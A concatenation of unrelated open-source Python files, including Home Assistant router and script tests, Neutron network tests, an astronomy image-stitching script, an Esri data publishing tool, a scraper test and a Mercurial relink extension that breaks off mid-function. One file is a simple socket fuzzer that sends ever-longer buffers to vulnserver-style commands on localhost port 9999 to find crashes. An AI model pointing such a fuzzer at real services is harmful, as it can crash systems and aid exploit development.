identity["user"] = dict(self.users.items(sec))
break
else:
identity["user"] = dict(self.users.items(key))
except ValueError:
pass
def make_plugin(ini_file, key_attribute=""):
return INIMetadataProvider(ini_file, key_attribute)
| cloudera/hue | desktop/core/ext-py3/pysaml2-5.0.0/src/saml2/s2repoze/plugins/ini.py | Python | apache-2.0 | 1,180 |
"""
Support for ASUSWRT routers.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/device_tracker.asuswrt/
"""
import logging
from homeassistant.components.device_tracker import DeviceScanner
from . import DATA_ASUSWRT
DEPENDENCIES = ['asuswrt']
_LOGGER = logging.getLogger(__name__)
async def async_get_scanner(hass, config):
"""Validate the configuration and return an ASUS-WRT scanner."""
scanner = AsusWrtDeviceScanner(hass.data[DATA_ASUSWRT])
await scanner.async_connect()
return scanner if scanner.success_init else None
class AsusWrtDeviceScanner(DeviceScanner):
"""This class queries a router running ASUSWRT firmware."""
# Eighth attribute needed for mode (AP mode vs router mode)
def __init__(self, api):
"""Initialize the scanner."""
self.last_results = {}
self.success_init = False
self.connection = api
async def async_connect(self):
"""Initialize connection to the router."""
# Test the router is accessible.
data = await self.connection.async_get_connected_devices()
self.success_init = data is not None
async def async_scan_devices(self):
"""Scan for new devices and return a list with found device IDs."""
await self.async_update_info()
return list(self.last_results.keys())
async def async_get_device_name(self, device):
"""Return the name of the given device or None if we don't know."""
if device not in self.last_results:
return None
return self.last_results[device].name
async def async_update_info(self):
"""Ensure the information from the ASUSWRT router is up to date.
Return boolean if scanning successful.
"""
_LOGGER.info('Checking Devices')
self.last_results = await self.connection.async_get_connected_devices()
| jamespcole/home-assistant | homeassistant/components/asuswrt/device_tracker.py | Python | apache-2.0 | 1,927 |
"""The tests for the Script component."""
# pylint: disable=protected-access
from datetime import timedelta
from unittest import mock
import unittest
from homeassistant.core import callback
# Otherwise can't test just this file (import order issue)
import homeassistant.components # noqa
import homeassistant.util.dt as dt_util
from homeassistant.helpers import script, config_validation as cv
from tests.common import fire_time_changed, get_test_home_assistant
ENTITY_ID = 'script.test'
class TestScriptHelper(unittest.TestCase):
"""Test the Script component."""
# pylint: disable=invalid-name
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
# pylint: disable=invalid-name
def tearDown(self):
"""Stop down everything that was started."""
self.hass.stop()
def test_firing_event(self):
"""Test the firing of events."""
event = 'test_event'
calls = []
@callback
def record_event(event):
"""Add recorded event to set."""
calls.append(event)
self.hass.bus.listen(event, record_event)
script_obj = script.Script(self.hass, cv.SCRIPT_SCHEMA({
'event': event,
'event_data': {
'hello': 'world'
}
}))
script_obj.run()
self.hass.block_till_done()
assert len(calls) == 1
assert calls[0].data.get('hello') == 'world'
assert not script_obj.can_cancel
def test_calling_service(self):
"""Test the calling of a service."""
calls = []
@callback
def record_call(service):
"""Add recorded event to set."""
calls.append(service)
self.hass.services.register('test', 'script', record_call)
script.call_from_config(self.hass, {
'service': 'test.script',
'data': {
'hello': 'world'
}
})
self.hass.block_till_done()
assert len(calls) == 1
assert calls[0].data.get('hello') == 'world'
def test_calling_service_template(self):
"""Test the calling of a service."""
calls = []
@callback
def record_call(service):
"""Add recorded event to set."""
calls.append(service)
self.hass.services.register('test', 'script', record_call)
script.call_from_config(self.hass, {
'service_template': """
{% if True %}
test.script
{% else %}
test.not_script
{% endif %}""",
'data_template': {
'hello': """
{% if True %}
world
{% else %}
Not world
{% endif %}
"""
}
})
self.hass.block_till_done()
assert len(calls) == 1
assert calls[0].data.get('hello') == 'world'
def test_delay(self):
"""Test the delay."""
event = 'test_event'
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
script_obj = script.Script(self.hass, cv.SCRIPT_SCHEMA([
{'event': event},
{'delay': {'seconds': 5}},
{'event': event}]))
script_obj.run()
self.hass.block_till_done()
assert script_obj.is_running
assert script_obj.can_cancel
assert script_obj.last_action == event
assert len(events) == 1
future = dt_util.utcnow() + timedelta(seconds=5)
fire_time_changed(self.hass, future)
self.hass.block_till_done()
assert not script_obj.is_running
assert len(events) == 2
def test_delay_template(self):
"""Test the delay as a template."""
event = 'test_evnt'
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
script_obj = script.Script(self.hass, cv.SCRIPT_SCHEMA([
{'event': event},
{'delay': '00:00:{{ 5 }}'},
{'event': event}]))
script_obj.run()
self.hass.block_till_done()
assert script_obj.is_running
assert script_obj.can_cancel
assert script_obj.last_action == event
assert len(events) == 1
future = dt_util.utcnow() + timedelta(seconds=5)
fire_time_changed(self.hass, future)
self.hass.block_till_done()
assert not script_obj.is_running
assert len(events) == 2
def test_cancel_while_delay(self):
"""Test the cancelling while the delay is present."""
event = 'test_event'
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
script_obj = script.Script(self.hass, cv.SCRIPT_SCHEMA([
{'delay': {'seconds': 5}},
{'event': event}]))
script_obj.run()
self.hass.block_till_done()
assert script_obj.is_running
assert len(events) == 0
script_obj.stop()
assert not script_obj.is_running
# Make sure the script is really stopped.
future = dt_util.utcnow() + timedelta(seconds=5)
fire_time_changed(self.hass, future)
self.hass.block_till_done()
assert not script_obj.is_running
assert len(events) == 0
def test_passing_variables_to_script(self):
"""Test if we can pass variables to script."""
calls = []
@callback
def record_call(service):
"""Add recorded event to set."""
calls.append(service)
self.hass.services.register('test', 'script', record_call)
script_obj = script.Script(self.hass, cv.SCRIPT_SCHEMA([
{
'service': 'test.script',
'data_template': {
'hello': '{{ greeting }}',
},
},
{'delay': '{{ delay_period }}'},
{
'service': 'test.script',
'data_template': {
'hello': '{{ greeting2 }}',
},
}]))
script_obj.run({
'greeting': 'world',
'greeting2': 'universe',
'delay_period': '00:00:05'
})
self.hass.block_till_done()
assert script_obj.is_running
assert len(calls) == 1
assert calls[-1].data['hello'] == 'world'
future = dt_util.utcnow() + timedelta(seconds=5)
fire_time_changed(self.hass, future)
self.hass.block_till_done()
assert not script_obj.is_running
assert len(calls) == 2
assert calls[-1].data['hello'] == 'universe'
def test_condition(self):
"""Test if we can use conditions in a script."""
event = 'test_event'
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
self.hass.states.set('test.entity', 'hello')
script_obj = script.Script(self.hass, cv.SCRIPT_SCHEMA([
{'event': event},
{
'condition': 'template',
'value_template': '{{ states.test.entity.state == "hello" }}',
},
{'event': event},
]))
script_obj.run()
self.hass.block_till_done()
assert len(events) == 2
self.hass.states.set('test.entity', 'goodbye')
script_obj.run()
self.hass.block_till_done()
assert len(events) == 3
@mock.patch('homeassistant.helpers.script.condition.async_from_config')
def test_condition_created_once(self, async_from_config):
"""Test that the conditions do not get created multiple times."""
event = 'test_event'
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
self.hass.states.set('test.entity', 'hello')
script_obj = script.Script(self.hass, cv.SCRIPT_SCHEMA([
{'event': event},
{
'condition': 'template',
'value_template': '{{ states.test.entity.state == "hello" }}',
},
{'event': event},
]))
script_obj.run()
script_obj.run()
self.hass.block_till_done()
assert async_from_config.call_count == 1
assert len(script_obj._config_cache) == 1
def test_all_conditions_cached(self):
"""Test that multiple conditions get cached."""
event = 'test_event'
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
self.hass.states.set('test.entity', 'hello')
script_obj = script.Script(self.hass, cv.SCRIPT_SCHEMA([
{'event': event},
{
'condition': 'template',
'value_template': '{{ states.test.entity.state == "hello" }}',
},
{
'condition': 'template',
'value_template': '{{ states.test.entity.state != "hello" }}',
},
{'event': event},
]))
script_obj.run()
self.hass.block_till_done()
assert len(script_obj._config_cache) == 2
| srcLurker/home-assistant | tests/helpers/test_script.py | Python | mit | 9,951 |
#!/usr/bin/python
import socket
buffer=["A"]
counter=50
while len(buffer) <= 100:
buffer.append("A"*counter)
counter=counter+50
commands=["HELP","STATS .","RTIME .","LTIME .","SRUN .","TRUN .","GMON .","GDOG .","KSTET .","GTER .","HTER .","LTER .","KSTAN ."]
for command in commands:
for buffstring in buffer:
print "Fuzzing " +command +":"+str(len(buffstring))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 9999))
s.recv(50)
s.send(command + buffstring)
s.close()
| appseckev/python_hacking_library | simplefuzzer.py | Python | gpl-3.0 | 581 |
# Copyright (c) 2013 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import itertools
import mock
import testtools
from webob import exc
from neutron import context
from neutron.db import models_v2
from neutron.extensions import external_net as external_net
from neutron import manager
from neutron.openstack.common import log as logging
from neutron.openstack.common import uuidutils
from neutron.tests.unit import test_api_v2
from neutron.tests.unit import test_db_plugin
LOG = logging.getLogger(__name__)
_uuid = uuidutils.generate_uuid
_get_path = test_api_v2._get_path
class ExtNetTestExtensionManager(object):
def get_resources(self):
return []
def get_actions(self):
return []
def get_request_extensions(self):
return []
class ExtNetDBTestCase(test_db_plugin.NeutronDbPluginV2TestCase):
def _create_network(self, fmt, name, admin_state_up, **kwargs):
"""Override the routine for allowing the router:external attribute."""
# attributes containing a colon should be passed with
# a double underscore
new_args = dict(itertools.izip(map(lambda x: x.replace('__', ':'),
kwargs),
kwargs.values()))
arg_list = new_args.pop('arg_list', ()) + (external_net.EXTERNAL,)
return super(ExtNetDBTestCase, self)._create_network(
fmt, name, admin_state_up, arg_list=arg_list, **new_args)
def setUp(self):
plugin = 'neutron.tests.unit.test_l3_plugin.TestNoL3NatPlugin'
ext_mgr = ExtNetTestExtensionManager()
super(ExtNetDBTestCase, self).setUp(plugin=plugin, ext_mgr=ext_mgr)
def _set_net_external(self, net_id):
self._update('networks', net_id,
{'network': {external_net.EXTERNAL: True}})
def test_list_nets_external(self):
with self.network() as n1:
self._set_net_external(n1['network']['id'])
with self.network():
body = self._list('networks')
self.assertEqual(len(body['networks']), 2)
body = self._list('networks',
query_params="%s=True" %
external_net.EXTERNAL)
self.assertEqual(len(body['networks']), 1)
body = self._list('networks',
query_params="%s=False" %
external_net.EXTERNAL)
self.assertEqual(len(body['networks']), 1)
def test_list_nets_external_pagination(self):
if self._skip_native_pagination:
self.skipTest("Skip test for not implemented pagination feature")
with contextlib.nested(self.network(name='net1'),
self.network(name='net3')) as (n1, n3):
self._set_net_external(n1['network']['id'])
self._set_net_external(n3['network']['id'])
with self.network(name='net2') as n2:
self._test_list_with_pagination(
'network', (n1, n3), ('name', 'asc'), 1, 3,
query_params='router:external=True')
self._test_list_with_pagination(
'network', (n2, ), ('name', 'asc'), 1, 2,
query_params='router:external=False')
def test_get_network_succeeds_without_filter(self):
plugin = manager.NeutronManager.get_plugin()
ctx = context.Context(None, None, is_admin=True)
result = plugin.get_networks(ctx, filters=None)
self.assertEqual(result, [])
def test_update_network_set_external_non_admin_fails(self):
# Assert that a non-admin user cannot update the
# router:external attribute
with self.network(tenant_id='noadmin') as network:
data = {'network': {'router:external': True}}
req = self.new_update_request('networks',
data,
network['network']['id'])
req.environ['neutron.context'] = context.Context('', 'noadmin')
res = req.get_response(self.api)
self.assertEqual(exc.HTTPForbidden.code, res.status_int)
def test_network_filter_hook_admin_context(self):
plugin = manager.NeutronManager.get_plugin()
ctx = context.Context(None, None, is_admin=True)
model = models_v2.Network
conditions = plugin._network_filter_hook(ctx, model, [])
self.assertEqual(conditions, [])
def test_network_filter_hook_nonadmin_context(self):
plugin = manager.NeutronManager.get_plugin()
ctx = context.Context('edinson', 'cavani')
model = models_v2.Network
txt = "externalnetworks.network_id IS NOT NULL"
conditions = plugin._network_filter_hook(ctx, model, [])
self.assertEqual(conditions.__str__(), txt)
# Try to concatenate conditions
conditions = plugin._network_filter_hook(ctx, model, conditions)
self.assertEqual(conditions.__str__(), "%s OR %s" % (txt, txt))
def test_create_port_external_network_non_admin_fails(self):
with self.network(router__external=True) as ext_net:
with self.subnet(network=ext_net) as ext_subnet:
with testtools.ExpectedException(
exc.HTTPClientError) as ctx_manager:
with self.port(subnet=ext_subnet,
set_context='True',
tenant_id='noadmin'):
pass
self.assertEqual(ctx_manager.exception.code, 403)
def test_create_port_external_network_admin_succeeds(self):
with self.network(router__external=True) as ext_net:
with self.subnet(network=ext_net) as ext_subnet:
with self.port(subnet=ext_subnet) as port:
self.assertEqual(port['port']['network_id'],
ext_net['network']['id'])
def test_create_external_network_non_admin_fails(self):
with testtools.ExpectedException(exc.HTTPClientError) as ctx_manager:
with self.network(router__external=True,
set_context='True',
tenant_id='noadmin'):
pass
self.assertEqual(ctx_manager.exception.code, 403)
def test_create_external_network_admin_succeeds(self):
with self.network(router__external=True) as ext_net:
self.assertEqual(ext_net['network'][external_net.EXTERNAL],
True)
def test_delete_network_check_disassociated_floatingips(self):
with mock.patch.object(manager.NeutronManager,
'get_service_plugins') as srv_plugins:
l3_mock = mock.Mock()
srv_plugins.return_value = {'L3_ROUTER_NAT': l3_mock}
with self.network() as net:
req = self.new_delete_request('networks', net['network']['id'])
res = req.get_response(self.api)
self.assertEqual(res.status_int, exc.HTTPNoContent.code)
(l3_mock.delete_disassociated_floatingips
.assert_called_once_with(mock.ANY, net['network']['id']))
| rdo-management/neutron | neutron/tests/unit/test_extension_ext_net.py | Python | apache-2.0 | 7,932 |
import math
def is_pentagonal(n):
pentagonals = []
j = 2
k = 1
while True:
| Daphron/project-euler | p44.py | Python | gpl-3.0 | 84 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division, print_function
import os
import glob
import h5py
import fitsio
import numpy as np
fns = glob.glob("data/k2/*.fits.gz")
base_fns = [os.path.split(fn)[1] for fn in fns]
n = len(fns)
meta = np.empty(n, dtype=[
("fn", np.str_, max(map(len, base_fns))), ("ra", float), ("dec", float),
("xmin", int), ("xmax", int), ("ymin", int), ("ymax", int)
])
print("First pass...")
for i, fn in enumerate(fns):
meta["fn"][i] = base_fns[i]
hdr = fitsio.read_header(fn, 2)
meta["ra"][i] = hdr["RA_OBJ"]
meta["dec"][i] = hdr["DEC_OBJ"]
meta["xmin"][i] = hdr["CRVAL1P"]
meta["xmax"][i] = hdr["CRVAL1P"] + hdr["NAXIS1"]
meta["ymin"][i] = hdr["CRVAL2P"]
meta["ymax"][i] = hdr["CRVAL2P"] + hdr["NAXIS2"]
# Normalize the axes.
meta["xmax"] -= meta["xmin"].min()
meta["xmin"] -= meta["xmin"].min()
meta["ymax"] -= meta["ymin"].min()
meta["ymin"] -= meta["ymin"].min()
print("Second pass...")
img, mask = None, None
quality = None
for i, fn in enumerate(fns):
tbl = fitsio.read(fn)
xi, yi = np.meshgrid(range(meta["xmin"][i], meta["xmax"][i]),
range(meta["ymin"][i], meta["ymax"][i]))
flux = tbl["FLUX"]
if img is None:
img = np.empty((len(flux), meta["xmax"].max(),
meta["ymax"].max()), dtype=float)
mask = np.zeros(img.shape[1:], dtype=bool)
img[:, xi, yi] = flux
mask[xi, yi] = True
time = tbl["TIME"]
# Save a FITS image for WCS calibration using astrometry.net
fitsio.write("data/k2.fits", img[-1], clobber=True)
# Save the block of frames as a huge HDF5 file.
print("Saving...")
with h5py.File("data/k2.h5", "w") as f:
f.create_dataset("frames", data=img)
f.create_dataset("mask", data=mask)
f.create_dataset("time", data=time)
| dfm/photoica | stitch.py | Python | mit | 1,839 |
# -*- coding: utf-8 -*-
# Part of hexy. See LICENSE file for full copyright and licensing details.
import os
import sys
import arrow
from .util.bubble import Bubble
from .util.deb import deb,debset
from .grid import (grid_make,
grid_reset,
grid_show,
grid_set_point,
grid_add_line,
grid_add_circle)
from .draw import grid_draw
from .read import grid_read
from .cslice import grid_cslice
from .cursor import grid_cursor
HEXY_START_ARROW=arrow.now()
from . import metadata
"""hexy, hexagonal ascii drawing toolkit"""
HEXY_SIMPLE_LOGO = """
#: _ _ _ _
#: / _ _ _ \
#: / / _ _ \ \
#: / / / _ \ \ \
#: \ \ \_ _/ / /
#: \ \_ _ _/ /
#: \_ _ _ _/
#:
"""
__version__ = metadata.version
__author__ = metadata.authors[0]
__license__ = metadata.license
__copyright__ = metadata.copyright
class Hexy(object):
""" basic Hexagonal grid manager """
def __init__(self,x=1,y=1):
self.X=x
self.Y=y
#cursor
self.cx=None
self.cy=None
self.cformat=None
self.grid=grid_make(x,y)
self.dumb=False #does not renember between consequent method calls
def show(self):
return grid_show(self.grid)
def draw(self,xpos,ypos,size):
grid_draw(self.grid,xpos,ypos,size,self.X,self.Y)
def reset(self):
self.grid=grid_reset(self.grid,self.X,self.Y)
def cursor(self,xpos,ypos,cformat):
self.cx=xpos
self.cy=ypos
self.cformat=cformat
self.grid=grid_cursor(self.grid,xpos,ypos,cformat,self.X,self.Y)
def point(self,xpos,ypos,char):
self.grid=grid_set_point(self.grid,xpos,ypos,char,self.X,self.Y)
def circle(self,xpos,ypos,rmin,rmax,char):
self.grid=grid_add_circle(self.grid,xpos,ypos,rmin,rmax,char,self.X,self.Y)
def line(self,xpos,ypos,chars,size,direction):
if self.dumb:
self.grid=grid_make(self.X,self.Y)
grid,X,Y=grid_add_line(self.grid,xpos,ypos,size,direction,chars,self.X,self.Y)
self.grid=grid
def read(self,fc=[]):
g,x,y=grid_read(fc)
self.X=x
self.Y=y
self.grid=g
deb('read:',g,x,y)
def cslice(self,f,t,d):
self.grid=grid_cslice(self.grid,f,t,d)
deb('slice:',self)
def hexy():
return Hexy()
| e7dal/hexy | hexy/__init__.py | Python | gpl-3.0 | 2,172 |
"""Utilities available to workbench applications."""
def make_safe_for_html(html):
"""Turn the text `html` into a real HTML string."""
html = html.replace("&", "&")
html = html.replace(" ", " ")
html = html.replace("<", "<")
html = html.replace("\n", "<br>")
return html
| jamiefolsom/xblock-sdk | workbench/util.py | Python | agpl-3.0 | 309 |
"""
-------------------------------------------------------------------------------
| Copyright 2016 Esri
|
| Licensed under the Apache License, Version 2.0 (the "License");
| you may not use this file except in compliance with the License.
| You may obtain a copy of the License at
|
| http://www.apache.org/licenses/LICENSE-2.0
|
| Unless required by applicable law or agreed to in writing, software
| distributed under the License is distributed on an "AS IS" BASIS,
| WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
| See the License for the specific language governing permissions and
| limitations under the License.
------------------------------------------------------------------------------
"""
# dlaPublish.py - Publish one source to a target
# ----------------------------------------------------------------------------------------------------------------------
'''
This script is called by both Append Data and Replace Data tools. It has several options for running
the tool using as a Geoprocessing script directly or by callng dlaPublish.publish from another script.
Note in the GP script approach a source and target dataset can be provided as parameters to override the settings
in the Xml Config file. In this case just a single xml file should be passed with the datasets as the 2nd and 3rd
parameters. By default this will use the Append approach, to use replace by settings you can also make the
useReplaceSettings variable to change the behavior (see example at the end of this script).
'''
import arcpy,dlaExtractLayerToGDB,dlaFieldCalculator,dlaService,dla,dlaService,xml.dom.minidom,os
arcpy.AddMessage("Data Assistant")
xmlFileNames = arcpy.GetParameterAsText(0) # xml file name as a parameter, multiple values separated by ;
continue_on_error = arcpy.GetParameterAsText(2) # boolean check to see if xml should continue or not on error
_outParam = 1
_useReplaceSettings = False # change this from a calling script to make this script replace data.
_chunkSize = 100
def main(argv = None):
# this approach makes it easier to call publish from other python scripts with using GP tool method
publish(xmlFileNames, continue_on_error)
def publish(xmlFileNames, continue_on_error):
# function called from main or from another script, performs the data update processing
global _useReplaceSettings
dla._errCount = 0
dla.addMessage("CONTINUE ON ERROR SET TO: "+ str(continue_on_error))
arcpy.SetProgressor("default","Data Assistant")
arcpy.SetProgressorLabel("Data Assistant")
xmlFiles = xmlFileNames.split(";")
layers = []
for xmlFile in xmlFiles: # multi value parameter, loop for each file
xmlFile = dla.getXmlDocName(xmlFile)
dla.addMessage("Configuration file: " + xmlFile)
xmlDoc = dla.getXmlDoc(xmlFile) # parse the xml document
if xmlDoc == None:
dla.addError("No XML document could be parsed. Please ensure the path to the xml document is correct")
if continue_on_error:
continue
else:
return
prj = dla.setProject(xmlFile,dla.getNodeValue(xmlDoc,"Project"))
if prj == None:
dla.addError("Unable to open your project, please ensure it is in the same folder as your current project or your Config file")
if continue_on_error:
continue
else:
return False
source = dla.getDatasetPath(xmlDoc,"Source")
target = dla.getDatasetPath(xmlDoc,"Target")
targetName = dla.getDatasetName(target)
dla.addMessage(source)
dla.addMessage(target)
if dlaService.checkLayerIsService(source) or dlaService.checkLayerIsService(target):
token = dlaService.getSigninToken() # when signed in get the token and use this. Will be requested many times during the publish
# exit here before doing other things if not signed in
if token == None:
dla.addError("User must be signed in for this tool to work with services")
if continue_on_error:
continue
else:
return False
expr = getWhereClause(xmlDoc)
if _useReplaceSettings == True and (expr == '' or expr == None):
dla.addError("There must be an expression for replacing by field value, current value = " + str(expr))
if continue_on_error:
continue
else:
return False
errs = False
if dlaService.validateSourceUrl(source) == False:
dla.addError("Source path does not appear to be a valid feature layer")
errs = True
if _useReplaceSettings == True:
if dlaService.validateTargetReplace(target) == False:
dla.addError("Target path does not have correct privileges")
errs = True
elif _useReplaceSettings == False:
if dlaService.validateTargetAppend(target) == False:
dla.addError("Target path does not have correct privileges")
errs = True
if errs:
if continue_on_error:
continue
else:
return False
dla.setWorkspace()
if dla.isTable(source) or dla.isTable(target):
datasetType = 'Table'
else:
datasetType = 'FeatureClass'
if not dla.isStaged(xmlDoc):
res = dlaExtractLayerToGDB.extract(xmlFile,None,dla.workspace,source,target,datasetType)
if res != True:
table = dla.getTempTable(targetName)
msg = "Unable to export data, there is a lock on existing datasets or another unknown error"
if arcpy.TestSchemaLock(table) != True and arcpy.Exists(table) == True:
msg = "Unable to export data, there is a lock on the intermediate feature class: " + table
dla.addError(msg)
print(msg)
if continue_on_error:
continue
else:
return
else:
res = dlaFieldCalculator.calculate(xmlFile,dla.workspace,targetName,False, continue_on_error)
if res == True:
dlaTable = dla.getTempTable(targetName)
res = doPublish(xmlDoc,dlaTable,target,_useReplaceSettings)
else:
dla.addMessage('Data previously staged, will proceed using intermediate dataset')
dlaTable = dla.workspace + os.sep + dla.getStagingName(source,target)
res = doPublish(xmlDoc,dlaTable,target,_useReplaceSettings)
if res == True:
dla.removeStagingElement(xmlDoc)
xmlDoc.writexml(open(xmlFile, 'wt', encoding='utf-8'))
dla.addMessage('Staging element removed from config file')
arcpy.ResetProgressor()
if res == False:
err = "Data Assistant Update Failed, see messages for details"
dla.addError(err)
print(err)
else:
layers.append(target)
arcpy.SetParameter(_outParam,';'.join(layers))
def doPublish(xmlDoc,dlaTable,target,useReplaceSettings):
# either truncate and replace or replace by field value
# run locally or update agol
success = False
expr = ''
dlaTable = handleGeometryChanges(dlaTable,target)
if useReplaceSettings == True:
expr = getWhereClause(xmlDoc)
if useReplaceSettings == True and (expr == '' or expr == None):
dla.addError("There must be an expression for replacing by field value, current value = '" + str(expr) + "'")
return False
currGlobalIDs = arcpy.env.preserveGlobalIds
if dla.processGlobalIds(xmlDoc) and currGlobalIDs == False: # both datasets have globalids in the correct workspace types
arcpy.env.preserveGlobalIds = True
target = dla.getNodeValue(xmlDoc,"Target")
if target.startswith("http") == True:
success = dlaService.doPublishHttp(dlaTable,target,expr,useReplaceSettings)
else:
# logic change - if not replace field settings then only append
if expr != '' and useReplaceSettings == True:
if dla.deleteRows(target,expr) == True:
success = dla.appendRows(dlaTable,target,expr,continue_on_error)
else:
success = False
else:
success = dla.appendRows(dlaTable,target,'',continue_on_error)
if currGlobalIDs != arcpy.env.preserveGlobalIds:
arcpy.env.preserveGlobalIds = currGlobalIDs
return success
def getWhereClause(xmlDoc):
# get the where clause using the xml document or return ''
repl = xmlDoc.getElementsByTagName("ReplaceBy")[0]
fieldName = dla.getNodeValue(repl,"FieldName")
operator = dla.getNodeValue(repl,"Operator")
value = dla.getNodeValue(repl,"Value")
expr = ''
type = getTargetType(xmlDoc,fieldName)
if fieldName != '' and fieldName != '(None)' and operator != "Where":
if type == 'String':
value = "'" + value + "'"
expr = fieldName + " " + operator + " " + value
elif operator == 'Where':
expr = value
else:
expr = '' # empty string by default
return expr
def getTargetType(xmlDoc,fname):
# get the target field type
for tfield in xmlDoc.getElementsByTagName('TargetField'):
nm = tfield.getAttribute("Name")
if nm == fname:
return tfield.getAttribute("Type")
def handleGeometryChanges(sourceDataset,target):
# simplfiy polygons
if dla.isTable(sourceDataset):
return sourceDataset
desc = arcpy.Describe(sourceDataset) # assuming local file gdb
dataset = sourceDataset
if desc.ShapeType == "Polygon" and (target.lower().startswith("http://") == True or target.lower().startswith("https://") == True):
dataset = simplifyPolygons(sourceDataset)
else:
dataset = sourceDataset
return dataset
def simplifyPolygons(sourceDataset):
# simplify polygons using approach developed by Chris Bus.
dla.addMessage("Simplifying (densifying) Geometry")
arcpy.Densify_edit(sourceDataset)
simplify = sourceDataset + '_simplified'
if arcpy.Exists(simplify):
arcpy.Delete_management(simplify)
if arcpy.Exists(simplify + '_Pnt'):
arcpy.Delete_management(simplify + '_Pnt')
arcpy.SimplifyPolygon_cartography(sourceDataset, simplify, "POINT_REMOVE", "1 Meters")
return simplify
if __name__ == "__main__":
main()
| JRosenfeldIntern/data-assistant | Shared/GPTools/arcpy/dlaPublish.py | Python | apache-2.0 | 10,633 |
import os
import unittest
from manolo_scraper.spiders.minsa import MinsaSpider
from utils import fake_response_from_file
class TestMinsaSpider(unittest.TestCase):
def setUp(self):
self.spider = MinsaSpider()
def test_parse_item(self):
filename = os.path.join('data/minsa', '18-08-2015.html')
items = self.spider.parse(fake_response_from_file(filename, meta={'date': u'18/08/2015'}))
item = next(items)
self.assertEqual(item.get('full_name'), u'MELENDEZ ARISTA GREIDY')
self.assertEqual(item.get('time_start'), u'18:45:09')
self.assertEqual(item.get('institution'), u'minsa')
self.assertEqual(item.get('id_document'), u'DNI')
self.assertEqual(item.get('id_number'), u'41339966')
self.assertEqual(item.get('entity'), u'DIRESA AMAZONAS')
self.assertEqual(item.get('reason'), u'TRAMITE')
self.assertEqual(item.get('host_name'), u'VELASQUEZ VALDIVIA ANIBAL')
self.assertEqual(item.get('title'), u'MINISTRO DE SALUD')
self.assertEqual(item.get('office'), u'DESPACHO MINISTERIAL')
self.assertEqual(item.get('time_end'), None)
self.assertEqual(item.get('date'), u'2015-08-18')
number_of_items = 1 + sum(1 for x in items)
self.assertEqual(number_of_items, 20)
| aniversarioperu/django-manolo | scrapers/tests/test_minsa_spider.py | Python | bsd-3-clause | 1,311 |
# Mercurial extension to provide 'hg relink' command
#
# Copyright (C) 2007 Brendan Cully <brendan@kublai.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
"""recreates hardlinks between repository clones"""
from mercurial import cmdutil, hg, util, error
from mercurial.i18n import _
import os, stat
cmdtable = {}
command = cmdutil.command(cmdtable)
# Note for extension authors: ONLY specify testedwith = 'internal' for
# extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
# be specifying the version(s) of Mercurial they are tested with, or
# leave the attribute unspecified.
testedwith = 'internal'
@command('relink', [], _('[ORIGIN]'))
def relink(ui, repo, origin=None, **opts):
"""recreate hardlinks between two repositories
When repositories are cloned locally, their data files will be
hardlinked so that they only use the space of a single repository.
Unfortunately, subsequent pulls into either repository will break
hardlinks for any files touched by the new changesets, even if
both repositories end up pulling the same changes.
Similarly, passing --rev to "hg clone" will fail to use any
hardlinks, falling back to a complete copy of the source
repository.
This command lets you recreate those hardlinks and reclaim that
wasted space.
This repository will be relinked to share space with ORIGIN, which
must be on the same local disk. If ORIGIN is omitted, looks for
"default-relink", then "default", in [paths].
Do not attempt any read operations on this repository while the
command is running. (Both repositories will be locked against
writes.)
"""
if (not util.safehasattr(util, 'samefile') or
not util.safehasattr(util, 'samedevice')):
raise error.Abort(_('hardlinks are not supported on this system'))
src = hg.repository(repo.baseui, ui.expandpath(origin or 'default-relink',
origin or 'default'))
ui.status(_('relinking %s to %s\n') % (src.store.path, repo.store.path))
if repo.root == src.root:
ui.status(_('there is nothing to relink\n'))
return
if not util.samedevice(src.store.path, repo.store.path):
# No point in continuing
raise error.Abort(_('source and destination are on different devices'))
locallock = repo.lock()
try:
remotelock = src.lock()
try:
candidates = sorted(collect(src, ui))
targets = prune(candidates, src.store.path, repo.store.path, ui)
do_relink(src.store.path, repo.store.path, targets, ui)
finally:
remotelock.release()
finally:
locallock.release()
def collect(src, ui):
seplen = len(os.path.sep)
candidates = []
live = len(src['tip'].manifest())
# Your average repository has some files which were deleted before
# the tip revision. We account for that by assuming that there are
# 3 tracked files for every 2 live files as of the tip version of
# the repository.
#
# mozilla-central as of 2010-06-10 had a ratio of just over 7:5.
total = live * 3 // 2
src = src.store.path
pos = 0
ui.status(_("tip has %d files, estimated total number of files: %d\n")
% (live, total))
for dirpath, dirnames, filenames in os.walk(src):
dirnames.sort()
relpath = dirpath[len(src) + seplen:]
for filename in sorted(filenames):
if filename[-2:] not in ('.d', '.i'):
continue
st = os.stat(os.path.join(dirpath, filename))
if not stat.S_ISREG(st.st_mode):
continue
pos += 1
candidates.append((os.path.join(relpath, filename), st))
ui.progress(_('collecting'), pos, filename, _('files'), total)
ui.progress(_('collecting'), None)
ui.status(_('collected %d candidate storage files\n') % len(candidates))
return candidates
def prune(candidates, src, dst, ui):
def linkfilter(src, dst, st):
try:
ts = os.stat(dst)
except OSError:
# Destination doesn't have this file?
return False
if util.samefile(src, dst):
return False
